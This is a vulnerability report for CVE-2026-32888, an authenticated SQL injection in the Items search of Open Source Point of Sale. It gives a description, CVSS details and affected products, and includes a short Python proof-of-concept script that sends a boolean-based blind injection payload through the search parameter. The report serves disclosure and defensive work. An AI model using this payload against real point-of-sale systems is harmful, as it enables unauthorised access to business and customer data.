Security Vulnerability Report
CVE-2026-32888 CVSS 8.8 HIGH

CVE-2026-32888

Published: 2026-03-20 03:16:00
Last Modified: 2026-04-08 20:54:01

Description

Open Source Point of Sale is a web-based point-of-sale application written in PHP using the CodeIgniter framework. Affected versions contain an SQL injection in the Items search functionality. When the custom attribute search feature is enabled (search_custom filter), user-supplied input from the search GET parameter is interpolated directly into a HAVING clause without parameterization or sanitization. This allows an authenticated attacker with basic item search permissions to execute arbitrary SQL queries. A patch did not exist at the time of publication.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:opensourcepos:open_source_point_of_sale:*:*:*:*:*:*:*:* - VULNERABLE
No specific version given (all versions affected at the time of publication contain this vulnerability); the NVD configuration data for this record lists versionEndIncluding 3.4.2.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL (Example)
target_url = "http://target-ospos/index.php/items"

# Attacker requires a valid low-privilege session cookie
session_cookies = {
    "ci_session": "attacker_session_id_here"
}

# Malicious payload designed for HAVING clause injection
# This payload attempts to perform a boolean-based blind injection
sql_payload = "1' AND 1=1-- -"

parameters = {
    "search_custom": "1",  # This filter must be enabled to trigger the vulnerability
    "search": sql_payload
}

response = requests.get(target_url, params=parameters, cookies=session_cookies)

if response.status_code == 200:
    print("Payload sent successfully. Check response for timing or content differences.")
else:
    print("Request failed.")

References

https://github.com/opensourcepos/opensourcepos/security/advisories/GHSA-hmjv-wm3j-pfhw (Exploit, Vendor Advisory, Patch)
